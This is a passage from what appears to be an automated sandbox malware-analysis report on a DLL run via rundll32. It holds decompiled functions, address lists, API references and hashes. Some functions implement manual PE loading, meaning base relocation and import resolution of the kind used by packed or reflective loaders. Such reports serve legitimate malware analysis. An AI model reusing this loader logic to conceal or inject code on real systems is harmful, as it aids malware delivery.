					_v28 = _v52[2];
					_v56 = _v56 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v52[4]);
					_v92 = _a4 +  *_v52;
					_v60 = _v28;
					while(1) {
						_v88 = _v60;
						_v60 = _v60 - 1;
						if(_v88 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v48 = (_v12 & 0x0000ffff) + _v92;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v64;
							}
						} else {
							 *_v48 =  *_v48 + _v64;
						}
						_v32 =  &(_v32[1]);
					}
					_v52 = _v32;
				}
				goto L13;
			}

0x10014e05
0x10014e12
0x10014e18
0x10014e21
0x10014e24
0x10014e27
0x00000000
0x10014f18
0x10014f1c
0x10014f1e
0x10014f2c
0x1001504a
0x1001504e
0x10015113
0x1001511c
0x1001511f
0x10015123
0x10015129
0x10015131
0x10015131
0x10015139
0x10015147
0x1001514a
0x1001514e
0x10015154
0x10015164
0x1001518f
0x00000000
0x10015191
0x1001516a
0x1001517b
0x00000000
0x10015189
0x1001518d
0x00000000
0x10015189
0x1001517d
0x10015181
0x10015186
0x00000000
0x10015186
0x1001516c
0x10015170
0x10015172
0x00000000
0x10015172
0x10015156
0x1001515a
0x00000000
0x1001515c
0x10015054
0x10015058
0x1001505a
0x10015068
0x00000000
0x00000000
0x1001506e
0x10015077
0x10015085
0x10015091
0x1001509d
0x100150a6
0x100150a9
0x100150ad
0x100150af
0x100150bc
0x100150d0
0x100150df
0x100150f0
0x100150b9
0x00000000
0x100150b9
0x100150f2
0x100150f6
0x100150fb
0x00000000
0x100150fb
0x10015106
0x00000000
0x00000000
0x10015108
0x1001510c
0x00000000
0x1001510e
0x10014f32
0x10014f3b
0x10014f49
0x10014f4c
0x10014f69
0x10014f70
0x10014f82
0x10014f82
0x10014f89
0x10014f99
0x10014fb1
0x10014f9b
0x10014fa3
0x10014fa3
0x10014fb4
0x10014fb8
0x10014fc8
0x10014feb
0x10014ffd
0x10014fca
0x10014fde
0x10014fde
0x10015007
0x10015023
0x10015009
0x10015018
0x10015018
0x1001502b
0x10015034
0x10015034
0x10015042
0x00000000
0x10014f8b
0x10014f8d
0x00000000
0x10014f8d
0x10014f89
0x00000000
0x10014f4c
0x10014e2f
0x10014e3d
0x10014e42
0x10014e4d
0x10014e50
0x10014e54
0x10014e56
0x10014e66
0x10014e6f
0x10014e78
0x10014e80
0x10014e89
0x10014e94
0x10014e9a
0x10014e9d
0x10014ea0
0x10014ea7
0x10014eae
0x00000000
0x00000000
0x10014eb9
0x10014ec7
0x10014ed2
0x10014edc
0x10014ef4
0x10014f01
0x10014f01
0x10014ede
0x10014ee9
0x10014ee9
0x10014f08
0x10014f08
0x10014f10
0x10014f10
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 10014F63
LoadLibraryA.KERNEL32(00000000), ref: 10014F7C
GetProcAddress.KERNEL32(00000000,?), ref: 10014FD8
GetProcAddress.KERNEL32(00000000,?), ref: 10014FF7
lstrcmpA.KERNEL32(?,00000000), ref: 100150E8

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModulelstrcmp
String ID:
API String ID: 1872726118-0
Opcode ID: 419c020a87105bdceccdc306fbfdf2abceeec5315adc811461ed6dcf7bea98ed
Instruction ID: f6e2eba122cbf77a2ae5ba8af3865ace0f975eec235aae4e96ffcfdcfd34bc1d
Opcode Fuzzy Hash: 419c020a87105bdceccdc306fbfdf2abceeec5315adc811461ed6dcf7bea98ed
Instruction Fuzzy Hash: 65E18D74A10209EFDB51CFA8C880BADBBF1FB08355F258569E815AF3A1D735E981CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10012C1B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

@, xrefs: 10012C89
\u%04X, xrefs: 10012D35
\u%04X\u%04X, xrefs: 10012D74

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: d386108904b2367e7a539220f608067250315fab26c66a0f40ad273b13d001fd
Instruction ID: 2f7f0510fea53a2a38c644e53789d9b16a97eaeec47c91ed49662b1c0a338719
Opcode Fuzzy Hash: d386108904b2367e7a539220f608067250315fab26c66a0f40ad273b13d001fd
Instruction Fuzzy Hash: CE4106F1A0025567CF24CAA8ED95BEE3BD5DF41254F200116FE02EE255E675CDF092D1

Uniqueness

Uniqueness Score: -1.00%

Function 100145EB Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E100145EB(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				signed int _t23;
				void* _t30;
				char* _t31;
				char* _t33;
				char* _t35;
				char* _t37;
				char* _t38;
				long long* _t40;

				_t30 = __edi;
				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t35 = _a4;
				_push(_t25);
				 *_t40 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t35);
				L10014744();
				_t23 = _t12;
				if(_t23 < 0 || _t23 >= _a8) {
					L16:
					_t13 = _t12 | 0xffffffff;
					goto L17;
				} else {
					E100145C4(_t12, _t35);
					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
						L8:
						_push(_t30);
						_t37 = strchr(_t35, 0x65);
						_t31 = _t37;
						if(_t37 == 0) {
							L15:
							_t13 = _t23;
							L17:
							return _t13;
						}
						_t38 = _t37 + 1;
						_t33 = _t31 + 2;
						if( *_t38 == 0x2d) {
							_t38 = _t33;
						}
						while( *_t33 == 0x30) {
							_t33 = _t33 + 1;
						}
						if(_t33 != _t38) {
							E10009627(_t38, _t33, _t23 - _t33 + _a4);
							_t23 = _t23 + _t38 - _t33;
						}
						goto L15;
					} else {
						_t6 = _t23 + 3; // 0x10012dd6
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L16;
						}
						_t35[_t23] = 0x302e;
						( &(_t35[2]))[_t23] = 0;
						_t23 = _t23 + 2;
						goto L8;
					}
				}
			}

0x100145eb
0x100145ee
0x100145f3
0x100145f7
0x100145f7
0x100145fd
0x10014601
0x10014602
0x10014605
0x10014606
0x1001460b
0x1001460e
0x1001460f
0x10014614
0x1001461b
0x100146a4
0x100146a4
0x00000000
0x10014626
0x10014627
0x10014639
0x1001465f
0x1001465f
0x10014668
0x1001466a
0x10014670
0x1001469f
0x1001469f
0x100146a7
0x100146aa
0x100146aa
0x10014672
0x10014673
0x10014679
0x1001467b
0x1001467b
0x10014680
0x1001467f
0x1001467f
0x10014687
0x10014693
0x1001469d
0x1001469d
0x00000000
0x10014649
0x10014649
0x10014649
0x1001464f
0x00000000
0x00000000
0x10014651
0x10014657
0x1001465c
0x00000000
0x1001465c
0x10014639

APIs

_snprintf.MSVCRT ref: 1001460F
strchr.MSVCRT ref: 1001462F
strchr.MSVCRT ref: 1001463E
strchr.MSVCRT ref: 10014663

Strings

%.*g, xrefs: 10014606

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: strchr$_snprintf
String ID: %.*g
API String ID: 3619936089-952554281
Opcode ID: b4e02f500dbcddab9fbb118d48120a078f2ff9c1d23ce214e2ebe6660eda143c
Instruction ID: 4f38b1db0cc1ba9a95d8daf564856a08a1274e3eb1987c121476b3081b14d048
Opcode Fuzzy Hash: b4e02f500dbcddab9fbb118d48120a078f2ff9c1d23ce214e2ebe6660eda143c
Instruction Fuzzy Hash: BD210576604A562BE725CE689C85F9B3788DF032A8F270125F8449E1A1EFB1EDC04392

Uniqueness

Uniqueness Score: -1.00%

Function 69372D40 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 69372D59
_unlock.MSVCRT ref: 69372D81
calloc.MSVCRT ref: 69372DCF

Memory Dump Source

Source File: 0000000E.00000002.33863545872.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000E.00000002.33863518149.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863839229.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864047567.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864078936.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864107791.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864265674.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_69340000_rundll32.jbxd

Similarity

API ID: _lock_unlockcalloc
String ID:
API String ID: 3876498383-0
Opcode ID: 30ec0759352225e0716ba92093262c380eb6c150035cf29b0649b0a0721d6924
Instruction ID: e57ba15901c9424b43c566300453cded90fc4af5f3279247c11cd0579015c456
Opcode Fuzzy Hash: 30ec0759352225e0716ba92093262c380eb6c150035cf29b0649b0a0721d6924
Instruction Fuzzy Hash: B811F9751043418BE760DF28C68075A7BE4FF45754F158669E8E8CF285EB38D842CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 1000B194 Relevance: 7.6, APIs: 5, Instructions: 59
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E1000B194(WCHAR* __ecx) {
				int _v8;
				WCHAR* _v12;
				short _v532;
				WCHAR* _t17;
				WCHAR* _t21;
				WCHAR* _t24;
				WCHAR** _t27;
				signed int _t28;
				signed int _t29;

				_v8 = _v8 & 0x00000000;
				_t21 = __ecx;
				_t29 = _t28 | 0xffffffff;
				_t27 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
				if(_t27 != 0 && _v8 > 0) {
					_t24 =  *_t27;
					if( *_t24 == 0x5c || _t24[1] == 0x3a) {
						lstrcpynW(_t21, _t24, 0x104);
					} else {
						GetCurrentDirectoryW(0x104,  &_v532);
						_push(0);
						_push( *_t27);
						_push("\\");
						_t17 = E10009DC8( &_v532);
						_v12 = _t17;
						lstrcpynW(_t21, _t17, 0x104);
						E1000953B( &_v12, 0xfffffffe);
					}
					_t29 = 0;
				}
				return _t29;
			}

0x1000b19d
0x1000b1a4
0x1000b1a6
0x1000b1ba
0x1000b1be
0x1000b1c6
0x1000b1cc
0x1000b222
0x1000b1d5
0x1000b1e2
0x1000b1e8
0x1000b1ea
0x1000b1f2
0x1000b1f8
0x1000b200
0x1000b206
0x1000b212
0x1000b218
0x1000b228
0x1000b228
0x1000b230

APIs

GetCommandLineW.KERNEL32(00000000,00000000,00000001), ref: 1000B1A9
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 1000B1B4
GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 1000B1E2
lstrcpynW.KERNEL32(?,00000000,00000104), ref: 1000B206

Part of subcall function 1000953B: HeapFree.KERNEL32(00000000,00000000), ref: 10009581

lstrcpynW.KERNEL32(?,?,00000104), ref: 1000B222

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: CommandLinelstrcpyn$ArgvCurrentDirectoryFreeHeap
String ID:
API String ID: 3637931765-0
Opcode ID: e014ea068a66f965b81fdf9b6b28a64a0d01f846ec91616c0c377a967c2fd5ed
Instruction ID: 92cfb7d19344df0840c9c24c95e32cfe92fb274ad31b5fe10eba1c98c5779baa
Opcode Fuzzy Hash: e014ea068a66f965b81fdf9b6b28a64a0d01f846ec91616c0c377a967c2fd5ed
Instruction Fuzzy Hash: D01182B1D00219BBEB11DBA4DC8DFAAB7FCEF063A9F204559E511A2190E7B099818790

Uniqueness

Uniqueness Score: -1.00%

Function 1001478C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E1001478C(signed int __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;
				void* _t167;

				_t167 = __ecx;
				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E100097F9(_t167, _v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t34 = _v8 + 0xc; // 0xffff
						_v36 = LoadLibraryA( *_t34 + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_t43 = _v8 + 0x10; // 0xb8
								_v12 =  *_t43 + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_t73 = _v8 + 0x10; // 0xb8
									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										_t89 = _v8 + 0x10; // 0xb8
										 *( *_t89 + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

0x1001478c
0x10014792
0x1001479a
0x100147af
0x100147c1
0x100147cd
0x100147d3
0x100147d8
0x100147e4
0x1001494f
0x00000000
0x1001494f
0x100147ea
0x100147f3
0x10014801
0x10014804
0x10014813
0x10014813
0x1001481a
0x10014828
0x1001482b
0x1001483b
0x10014848
0x1001484f
0x1001485f
0x10014871
0x10014877
0x10014861
0x10014869
0x10014869
0x1001487a
0x1001487e
0x1001488a
0x1001488e
0x10014892
0x10014896
0x100148a2
0x100148cd
0x100148d5
0x100148db
0x100148e7
0x100148f3
0x100148a4
0x100148a9
0x100148b4
0x100148c0
0x100148c0
0x100148fc
0x10014902
0x1001490c
0x10014928
0x1001490e
0x10014911
0x1001491d
0x1001491d
0x1001490c
0x10014930
0x10014939
0x10014939
0x10014947
0x00000000
0x10014947
0x10014853
0x00000000
0x10014853
0x00000000
0x1001482b
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100147A9
LoadLibraryA.KERNEL32(00000000), ref: 10014842

Strings

kernel32.dll, xrefs: 100147A4
GetProcAddress, xrefs: 100147B2

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: fe3bb8f99f532b67af30be6aff3995f60063c948105e1a9caee6d08fae784d45
Instruction ID: 8b6fcfd140f2f906d51b79ea8514458062b2bcfb6dcd42a390860808ae8ece4b
Opcode Fuzzy Hash: fe3bb8f99f532b67af30be6aff3995f60063c948105e1a9caee6d08fae784d45
Instruction Fuzzy Hash: E2619F75D00209EFDB00CF98C481BADBBF1FF08365F218599E815AB2A1DB34AA81DF50

Uniqueness

Uniqueness Score: -1.00%

Function 69372280 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 6937230D

Strings

@, xrefs: 69372358

Memory Dump Source

Source File: 0000000E.00000002.33863545872.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000E.00000002.33863518149.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863839229.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864047567.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864078936.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864107791.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864265674.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_69340000_rundll32.jbxd

Similarity

API ID: QueryVirtual
String ID: @
API String ID: 1804819252-2766056989
Opcode ID: dd0d99adfd2ffd53138fc8728975c7a542ee737ff5ba6e544f4d3a9c1ee6c446
Instruction ID: 45dabc64c29d0d04d049ea0e05bff10a6739e34b8c88f5f4a194d3f13399f38f
Opcode Fuzzy Hash: dd0d99adfd2ffd53138fc8728975c7a542ee737ff5ba6e544f4d3a9c1ee6c446
Instruction Fuzzy Hash: 284181769043018FDB10DF68C68561AFBF4FF4A324F458A29D8A89B304E338E446CF96

Uniqueness

Uniqueness Score: -1.00%

Function 6937233C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 6937230D
VirtualProtect.KERNEL32 ref: 69372367
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6938B524), ref: 69372374

Part of subcall function 69372EA8: fwrite.MSVCRT ref: 69372ED7
Part of subcall function 69372EA8: vfprintf.MSVCRT ref: 69372EF7
Part of subcall function 69372EA8: abort.MSVCRT ref: 69372EFC

Strings

@, xrefs: 69372358

Memory Dump Source

Source File: 0000000E.00000002.33863545872.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000E.00000002.33863518149.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863839229.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864047567.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864078936.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864107791.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864265674.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_69340000_rundll32.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQueryabortfwritevfprintf
String ID: @
API String ID: 1616349570-2766056989
Opcode ID: 86c0dda3de06ea6ab3c9335e3712fc4df83484684ba0d1a7f146376356397ae6
Instruction ID: db348d529f06913b54d1c39fbc3be87fc87b17a083a0e57a2f9a1b5d3835264a
Opcode Fuzzy Hash: 86c0dda3de06ea6ab3c9335e3712fc4df83484684ba0d1a7f146376356397ae6
Instruction Fuzzy Hash: F5213AB68043418FDB10DF38D685619FBE0FF4A318F05CA29D8A89B254E338E506CF56

Uniqueness

Uniqueness Score: -1.00%

Function 10015390 Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E10015390(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8ac9b60f
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0x20d88a1
					_t12 = _t272 + 0x5c; // 0x9fe85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E100183B0(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E10017110(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x9fe85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E10017250( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0x20d88a1
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0x20d88a1
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x48af445
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0x20d88a1
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0x20d88a1
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
